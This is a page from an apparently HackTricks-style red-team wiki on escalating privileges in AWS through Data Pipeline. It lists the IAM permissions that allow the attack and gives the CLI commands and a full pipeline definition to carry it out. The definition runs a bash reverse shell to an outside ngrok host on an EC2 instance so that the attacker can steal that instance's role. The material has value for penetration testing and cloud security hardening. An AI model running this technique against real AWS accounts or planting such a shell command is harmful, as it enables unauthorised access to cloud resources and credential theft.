Links

AWS - Datapipeline Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:

datapipeline

For more info about datapipeline check:

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

Users with these permissions can escalate privileges by creating a Data Pipeline to execute arbitrary commands using the permissions of the assigned role:
aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations:
{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}
Note that the role in line 14, 15 and 27 needs to be a role assumable by datapipeline.amazonaws.com and the role in line 28 needs to be a role assumable by ec2.amazonaws.com with a EC2 profile instance.
Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one).
aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
--pipeline-definition file:///pipeline/definition.json
The pipeline definition file, crafted by the attacker, includes directives to execute commands or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges.
Potential Impact: Direct privesc to the ec2 service role specified.

References

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks: